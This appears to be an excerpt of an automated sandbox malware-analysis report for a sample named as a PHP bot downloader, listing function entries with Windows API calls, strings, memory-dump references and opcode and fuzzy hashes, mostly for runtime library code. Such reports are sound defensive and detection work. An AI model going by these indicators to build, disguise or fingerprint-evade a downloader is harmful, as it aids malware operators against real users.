                                                • Opcode ID: d05e834672c3922e5a6c897896d78d0ee0807681eb762845170bdc3133b728b2
                                                • Instruction ID: 0d043d0573b05ca8534ea1d9e069cbea241ba02efa480cef0f9aecf7bd7450ea
                                                • Opcode Fuzzy Hash: d05e834672c3922e5a6c897896d78d0ee0807681eb762845170bdc3133b728b2
                                                • Instruction Fuzzy Hash: 9B21F820B19B3BD1FA55AB75BC5527423B0AF85741F4C4435CA5EF2EA1EE3CB4498308
                                                Function 00007FF658E242E0 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 50COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2019170510.00007FF658E21000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF658E20000, based on PE: true
                                                • Associated: 0000000C.00000002.2019138076.00007FF658E20000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019211886.00007FF658E4B000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019499545.00007FF658E5F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019541766.00007FF658E62000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019541766.00007FF658E66000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_7ff658e20000_php_bot_downloader_v2-AVERAGE-BOI-CLN.jbxd
                                                Similarity
                                                • API ID: Yarn$std::_$Locinfo::_Locinfo_ctorLockitLockit::_
                                                • String ID: bad locale name
                                                • API String ID: 3904239083-1405518554
                                                • Opcode ID: 4d20062005d52e6d3db2030ef939464a733f81348363e0549d74b71ef5b6912e
                                                • Instruction ID: 9c92ae374c3f88886ec5fafd9744ca1b0b8bb55f2b815c7a11868f5c8132253b
                                                • Opcode Fuzzy Hash: 4d20062005d52e6d3db2030ef939464a733f81348363e0549d74b71ef5b6912e
                                                • Instruction Fuzzy Hash: 09112151E6965782EE44E73AE88666E5360EFC2B84F482435F98F73B67DD3CD0114B08
                                                Function 00007FF658E307AC Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 319COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2019170510.00007FF658E21000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF658E20000, based on PE: true
                                                • Associated: 0000000C.00000002.2019138076.00007FF658E20000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019211886.00007FF658E4B000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019499545.00007FF658E5F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019541766.00007FF658E62000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019541766.00007FF658E66000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_7ff658e20000_php_bot_downloader_v2-AVERAGE-BOI-CLN.jbxd
                                                Similarity
                                                • API ID: Frame$BlockEstablisherHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                • String ID: csm$csm$csm
                                                • API String ID: 3606184308-393685449
                                                • Opcode ID: a124b85dfb71e3b74eb00f91c3f92f93adecf0c1a6d71bf5cd3011c25a91d866
                                                • Instruction ID: 456abc6e59ca642859c885eef16c619be23957d0d359338f59d579d7c2b2e698
                                                • Opcode Fuzzy Hash: a124b85dfb71e3b74eb00f91c3f92f93adecf0c1a6d71bf5cd3011c25a91d866
                                                • Instruction Fuzzy Hash: 3AE16F32A087529AEB619B75D4413AD77B0FB85798F180135DE8DA7FA6CF38E890C704
                                                Function 00007FF658E3F034 Relevance: 10.8, APIs: 7, Instructions: 291COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2019170510.00007FF658E21000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF658E20000, based on PE: true
                                                • Associated: 0000000C.00000002.2019138076.00007FF658E20000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019211886.00007FF658E4B000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019499545.00007FF658E5F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019541766.00007FF658E62000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019541766.00007FF658E66000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_7ff658e20000_php_bot_downloader_v2-AVERAGE-BOI-CLN.jbxd
                                                Similarity
                                                • API ID: _invalid_parameter_noinfo
                                                • String ID:
                                                • API String ID: 3215553584-0
                                                • Opcode ID: 073ffab9575f921b19d5eca0bd6a1b02315b113ae5b68c4e01bf469d61ae1604
                                                • Instruction ID: 73db151616ada874f1ee5ebbb119c003af6adbdf858d11ddd4b8f229cb942d75
                                                • Opcode Fuzzy Hash: 073ffab9575f921b19d5eca0bd6a1b02315b113ae5b68c4e01bf469d61ae1604
                                                • Instruction Fuzzy Hash: 74C1A332A0C6A681EB619B35A4402BD67B0FB81B80F5D0131DA4EA7BB5DE7CFC55C708
                                                Function 00007FF658E2A240 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 138COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2019170510.00007FF658E21000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF658E20000, based on PE: true
                                                • Associated: 0000000C.00000002.2019138076.00007FF658E20000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019211886.00007FF658E4B000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019499545.00007FF658E5F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019541766.00007FF658E62000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019541766.00007FF658E66000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_7ff658e20000_php_bot_downloader_v2-AVERAGE-BOI-CLN.jbxd
                                                Similarity
                                                • API ID: char_traits
                                                • String ID:
                                                • API String ID: 1158913984-3916222277
                                                • Opcode ID: de8db9d032ffcfc8b79d9f3ae03ebbbacc1b6865db1827f2b6139635527112c9
                                                • Instruction ID: 951c7ba2acc1cd812d9132b96d49dd0afbf9adeab8b9912770a115230e81936b
                                                • Opcode Fuzzy Hash: de8db9d032ffcfc8b79d9f3ae03ebbbacc1b6865db1827f2b6139635527112c9
                                                • Instruction Fuzzy Hash: 4E712D22A0DA9685E660DB25EC417BEB7B0FB81740F580132E68ED7E9ADF3CD444CB14
                                                Function 00007FF658E32FFC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 86libraryloaderCOMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                • LoadLibraryExW.KERNEL32(?,?,?,00007FF658E332AA,?,?,?,00007FF658E32F20,?,?,?,?,00007FF658E2FA59), ref: 00007FF658E3307F
                                                • GetLastError.KERNEL32(?,?,?,00007FF658E332AA,?,?,?,00007FF658E32F20,?,?,?,?,00007FF658E2FA59), ref: 00007FF658E3308D
                                                • LoadLibraryExW.KERNEL32(?,?,?,00007FF658E332AA,?,?,?,00007FF658E32F20,?,?,?,?,00007FF658E2FA59), ref: 00007FF658E330B7
                                                • FreeLibrary.KERNEL32(?,?,?,00007FF658E332AA,?,?,?,00007FF658E32F20,?,?,?,?,00007FF658E2FA59), ref: 00007FF658E330FD
                                                • GetProcAddress.KERNEL32(?,?,?,00007FF658E332AA,?,?,?,00007FF658E32F20,?,?,?,?,00007FF658E2FA59), ref: 00007FF658E33109
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2019170510.00007FF658E21000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF658E20000, based on PE: true
                                                • Associated: 0000000C.00000002.2019138076.00007FF658E20000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019211886.00007FF658E4B000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019499545.00007FF658E5F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019541766.00007FF658E62000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019541766.00007FF658E66000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_7ff658e20000_php_bot_downloader_v2-AVERAGE-BOI-CLN.jbxd
                                                Similarity
                                                • API ID: Library$Load$AddressErrorFreeLastProc
                                                • String ID: api-ms-
                                                • API String ID: 2559590344-2084034818
                                                • Opcode ID: 5899ebe8d8c7a3f7160a3d9b45089dab11f3e3eb393157d033fd784c249ca927
                                                • Instruction ID: b7f9fe1ffc2c8ef8f505de2bf34cc3c210122fde4feb9263caa9b81b32020caa
                                                • Opcode Fuzzy Hash: 5899ebe8d8c7a3f7160a3d9b45089dab11f3e3eb393157d033fd784c249ca927
                                                • Instruction Fuzzy Hash: 7E31E821B0966294FE629B76A80097523B4BF44BA0F4D0535DD1EA7BA4DF3CFC058708
                                                Function 00007FF658E48AB4 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2019170510.00007FF658E21000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF658E20000, based on PE: true
                                                • Associated: 0000000C.00000002.2019138076.00007FF658E20000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019211886.00007FF658E4B000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019499545.00007FF658E5F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019541766.00007FF658E62000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019541766.00007FF658E66000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_7ff658e20000_php_bot_downloader_v2-AVERAGE-BOI-CLN.jbxd
                                                Similarity
                                                • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                • String ID: CONOUT$
                                                • API String ID: 3230265001-3130406586
                                                • Opcode ID: a21c862472e3088139fc8571bc345ddbdf786caeb27319e9e41f84d8900d7b8b
                                                • Instruction ID: 0adeb9ca76d3e42a3af111bad5a3eadf210662e6ac5ce564b6ba26e8bb04219a
                                                • Opcode Fuzzy Hash: a21c862472e3088139fc8571bc345ddbdf786caeb27319e9e41f84d8900d7b8b
                                                • Instruction Fuzzy Hash: 53115421718B65C6E7508B62E85432976B0FBC9BE5F084234D9ADD7BA4DF3DD8048748
                                                Function 00007FF658E2AE90 Relevance: 9.2, APIs: 6, Instructions: 168COMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2019170510.00007FF658E21000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF658E20000, based on PE: true
                                                • Associated: 0000000C.00000002.2019138076.00007FF658E20000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019211886.00007FF658E4B000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019499545.00007FF658E5F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019541766.00007FF658E62000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019541766.00007FF658E66000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_7ff658e20000_php_bot_downloader_v2-AVERAGE-BOI-CLN.jbxd
                                                Similarity
                                                • API ID: Fgetc
                                                • String ID:
                                                • API String ID: 1720979605-0
                                                • Opcode ID: fb42830bdd064bb1acbce0b55d4d7959c793a1a6dabc3b39c22b22369a1dcea0
                                                • Instruction ID: d876d0316743eaa0b842944b0ae586c3b72e753cd46d85432c02cbfdc2fe1d8d
                                                • Opcode Fuzzy Hash: fb42830bdd064bb1acbce0b55d4d7959c793a1a6dabc3b39c22b22369a1dcea0
                                                • Instruction Fuzzy Hash: 14910F22A1DA9685E620EB25E8513AEB3B0FBC5780F544532E68FD3E99DF3CD444CB44
                                                Function 00007FF658E30C9C Relevance: 9.1, APIs: 2, Strings: 3, Instructions: 322COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2019170510.00007FF658E21000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF658E20000, based on PE: true
                                                • Associated: 0000000C.00000002.2019138076.00007FF658E20000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019211886.00007FF658E4B000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019499545.00007FF658E5F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019541766.00007FF658E62000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019541766.00007FF658E66000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_7ff658e20000_php_bot_downloader_v2-AVERAGE-BOI-CLN.jbxd
                                                Similarity
                                                • API ID: Is_bad_exception_allowedstd::bad_alloc::bad_alloc
                                                • String ID: csm$csm$csm
                                                • API String ID: 3523768491-393685449
                                                • Opcode ID: 2ddeceb2b1e2050200a8eb5915ffc846504ca094d5999cbdc1050429b9866f80
                                                • Instruction ID: 79f29145faf9c0da41d1c089eabec47b22ed622c67d535f97a9ee6d60c9b3aba
                                                • Opcode Fuzzy Hash: 2ddeceb2b1e2050200a8eb5915ffc846504ca094d5999cbdc1050429b9866f80
                                                • Instruction Fuzzy Hash: B9E19673A086A28AEB619F35D8413AD37B0FB45748F184135EA4DA7AA5CF3CF985C704
                                                Function 00007FF658E23390 Relevance: 9.1, APIs: 6, Instructions: 58COMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2019170510.00007FF658E21000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF658E20000, based on PE: true
                                                • Associated: 0000000C.00000002.2019138076.00007FF658E20000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019211886.00007FF658E4B000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019499545.00007FF658E5F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019541766.00007FF658E62000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019541766.00007FF658E66000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_7ff658e20000_php_bot_downloader_v2-AVERAGE-BOI-CLN.jbxd
                                                Similarity
                                                • API ID: Lockitstd::_$Lockit::_Lockit::~_$Concurrency::cancel_current_taskGetfacet__int64std::locale::_
                                                • String ID:
                                                • API String ID: 2644824941-0
                                                • Opcode ID: 4e8ff2d6e0e881a76c7e224c95ace2b212c0d57f2ab622ddbebd630806d503df
                                                • Instruction ID: 39da743d28c4e63c8cb6c93db0f95f6623fc2d16b252a1b3cd51fb1a49f4ab67
                                                • Opcode Fuzzy Hash: 4e8ff2d6e0e881a76c7e224c95ace2b212c0d57f2ab622ddbebd630806d503df
                                                • Instruction Fuzzy Hash: C8211C2291DA5681DA50DB25F88126AB3B0FBC47A4F581232F69F93FB9CE3CD540CB44
                                                Function 00007FF658E234A0 Relevance: 9.1, APIs: 6, Instructions: 58COMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2019170510.00007FF658E21000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF658E20000, based on PE: true
                                                • Associated: 0000000C.00000002.2019138076.00007FF658E20000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019211886.00007FF658E4B000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019499545.00007FF658E5F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019541766.00007FF658E62000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019541766.00007FF658E66000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_7ff658e20000_php_bot_downloader_v2-AVERAGE-BOI-CLN.jbxd
                                                Similarity
                                                • API ID: Lockitstd::_$Lockit::_Lockit::~_$Concurrency::cancel_current_taskGetfacet__int64std::locale::_
                                                • String ID:
                                                • API String ID: 2644824941-0
                                                • Opcode ID: 554728f3cb3212a051f0630be7b155290780745ec98476e122ebd23f86fb3f2a
                                                • Instruction ID: e894e3c5995f72e8fb1406ffa568db5827a7284b01301f34989df97097850ae2
                                                • Opcode Fuzzy Hash: 554728f3cb3212a051f0630be7b155290780745ec98476e122ebd23f86fb3f2a
                                                • Instruction Fuzzy Hash: AA21012691DA5681DA50DB25F88126AB7B0FBC47A4F581131F68F93FB9DE3CD540CB04
                                                Function 00007FF658E38B1C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24libraryloaderCOMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2019170510.00007FF658E21000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF658E20000, based on PE: true
                                                • Associated: 0000000C.00000002.2019138076.00007FF658E20000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019211886.00007FF658E4B000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019499545.00007FF658E5F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019541766.00007FF658E62000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019541766.00007FF658E66000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_7ff658e20000_php_bot_downloader_v2-AVERAGE-BOI-CLN.jbxd
                                                Similarity
                                                • API ID: AddressFreeHandleLibraryModuleProc
                                                • String ID: CorExitProcess$mscoree.dll
                                                • API String ID: 4061214504-1276376045
                                                • Opcode ID: 9cc20eae06868b564852225bda0ce1a891cf480019757d5227e3f406cf984c5b
                                                • Instruction ID: 8c10f0400e314bb426b9493bf0863862c56098dcb7d35b55e2500cc4170d295b
                                                • Opcode Fuzzy Hash: 9cc20eae06868b564852225bda0ce1a891cf480019757d5227e3f406cf984c5b
                                                • Instruction Fuzzy Hash: EBF05EA5B29B6691FF444B70E4953782370AFC4B50F081035D98FE6AB5CE3CE988C308
                                                Function 00007FF658E3007C Relevance: 7.8, APIs: 5, Instructions: 290COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2019170510.00007FF658E21000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF658E20000, based on PE: true
                                                • Associated: 0000000C.00000002.2019138076.00007FF658E20000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019211886.00007FF658E4B000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019499545.00007FF658E5F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019541766.00007FF658E62000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019541766.00007FF658E66000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_7ff658e20000_php_bot_downloader_v2-AVERAGE-BOI-CLN.jbxd
                                                Similarity
                                                • API ID: AdjustPointer
                                                • String ID:
                                                • API String ID: 1740715915-0
                                                • Opcode ID: 1f862b495ce0092b4b467d6445097635467c5ad24390af48dd2882038da0547f
                                                • Instruction ID: 3f8a3b8accd8729b983d14ed05a0a0d260dd73710afcc9898ba5219dedc7f2ef
                                                • Opcode Fuzzy Hash: 1f862b495ce0092b4b467d6445097635467c5ad24390af48dd2882038da0547f
                                                • Instruction Fuzzy Hash: D6B18331A0A66685EE669A35954063963B0AF44B84F0D8435DE4DB7FA6DE7CFC81C308
                                                Function 00007FF658E2A520 Relevance: 7.6, APIs: 5, Instructions: 87COMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2019170510.00007FF658E21000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF658E20000, based on PE: true
                                                • Associated: 0000000C.00000002.2019138076.00007FF658E20000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019211886.00007FF658E4B000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019499545.00007FF658E5F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019541766.00007FF658E62000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019541766.00007FF658E66000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_7ff658e20000_php_bot_downloader_v2-AVERAGE-BOI-CLN.jbxd
                                                Similarity
                                                • API ID: char_traits
                                                • String ID:
                                                • API String ID: 1158913984-0
                                                • Opcode ID: eee9b33b103d1c671d78ca435e39c14e0fe5bb946dc4f95c2f57295a9fdf7c4a
                                                • Instruction ID: 5f8cc2c2a7cedb49b97d14057f648126745fe887194eb28bfe1b6cbe3aab18e6
                                                • Opcode Fuzzy Hash: eee9b33b103d1c671d78ca435e39c14e0fe5bb946dc4f95c2f57295a9fdf7c4a
                                                • Instruction Fuzzy Hash: BB411D22A0C55385DA10AB61E85127AA371FBC0754F480031F68FE6EA6DFBCD445CB44
                                                Function 00007FF658E2AC70 Relevance: 7.6, APIs: 5, Instructions: 74COMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2019170510.00007FF658E21000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF658E20000, based on PE: true
                                                • Associated: 0000000C.00000002.2019138076.00007FF658E20000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019211886.00007FF658E4B000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019499545.00007FF658E5F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019541766.00007FF658E62000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019541766.00007FF658E66000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_7ff658e20000_php_bot_downloader_v2-AVERAGE-BOI-CLN.jbxd
                                                Similarity
                                                • API ID: ByteCharConcurrency::details::EmptyMultiQueue::StructuredWideWork$Func_class
                                                • String ID:
                                                • API String ID: 2499392862-0
                                                • Opcode ID: 6924f140a0b5c5d1967e81772abc8e7d71d3b60c7ca967b30c720e5a1017f485
                                                • Instruction ID: ed5d3ba0a6e21e09a317610c4a74535e9e625692c002ea93f846122bb9731482
                                                • Opcode Fuzzy Hash: 6924f140a0b5c5d1967e81772abc8e7d71d3b60c7ca967b30c720e5a1017f485
                                                • Instruction Fuzzy Hash: 1731F932619A9686E760EB21F85136AB7B1FBC5780F445035EACE97E69DF3CD4048B04
                                                Function 00007FF658E479AC Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2019170510.00007FF658E21000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF658E20000, based on PE: true
                                                • Associated: 0000000C.00000002.2019138076.00007FF658E20000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019211886.00007FF658E4B000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019499545.00007FF658E5F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019541766.00007FF658E62000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019541766.00007FF658E66000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_7ff658e20000_php_bot_downloader_v2-AVERAGE-BOI-CLN.jbxd
                                                Similarity
                                                • API ID: _set_statfp
                                                • String ID:
                                                • API String ID: 1156100317-0
                                                • Opcode ID: 5ec7d1d2ee78b7bb47a819edda9959dead6f4184f451086c1de1fab1feefcc3a
                                                • Instruction ID: b79edae6caa975e051b871b746ed06a396ae7c036f669ad1d9df3175f1c429f5
                                                • Opcode Fuzzy Hash: 5ec7d1d2ee78b7bb47a819edda9959dead6f4184f451086c1de1fab1feefcc3a
                                                • Instruction Fuzzy Hash: 2C119422E18A2B01F7541538DC413B510616FD4374F1D0638EAEEF6FFA8E7CE9415189
                                                Function 00007FF658E40998 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 211COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2019170510.00007FF658E21000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF658E20000, based on PE: true
                                                • Associated: 0000000C.00000002.2019138076.00007FF658E20000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019211886.00007FF658E4B000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019499545.00007FF658E5F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019541766.00007FF658E62000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019541766.00007FF658E66000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_7ff658e20000_php_bot_downloader_v2-AVERAGE-BOI-CLN.jbxd
                                                Similarity
                                                • API ID: _invalid_parameter_noinfo
                                                • String ID: UTF-16LEUNICODE$UTF-8$ccs
                                                • API String ID: 3215553584-1196891531
                                                • Opcode ID: 235069ecbf4a5eaf0fbea59f941ac267a5bf642a7a0aa0abdf81a8f9634a849a
                                                • Instruction ID: c51d81f12461daf5231190d7b0a133446771882845a4b1df602075a0f8ab708e
                                                • Opcode Fuzzy Hash: 235069ecbf4a5eaf0fbea59f941ac267a5bf642a7a0aa0abdf81a8f9634a849a
                                                • Instruction Fuzzy Hash: 1E81A232E0C26289F7E74A3982542392BB09B9174CF6D5035CACDF6DB5CE3DA9059A0D
                                                Function 00007FF658E313C4 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 190COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2019170510.00007FF658E21000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF658E20000, based on PE: true
                                                • Associated: 0000000C.00000002.2019138076.00007FF658E20000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019211886.00007FF658E4B000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019499545.00007FF658E5F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019541766.00007FF658E62000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019541766.00007FF658E66000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_7ff658e20000_php_bot_downloader_v2-AVERAGE-BOI-CLN.jbxd
                                                Similarity
                                                • API ID: CallEncodePointerTranslator
                                                • String ID: MOC$RCC
                                                • API String ID: 3544855599-2084237596
                                                • Opcode ID: 6334b790ba180b6d72bd3d4becf287214f241295dda6d2a72eef6ce3b9437840
                                                • Instruction ID: a219cbf3e5308b122b4012d85ab35b384283f2d81100786a1009b6a406386e45
                                                • Opcode Fuzzy Hash: 6334b790ba180b6d72bd3d4becf287214f241295dda6d2a72eef6ce3b9437840
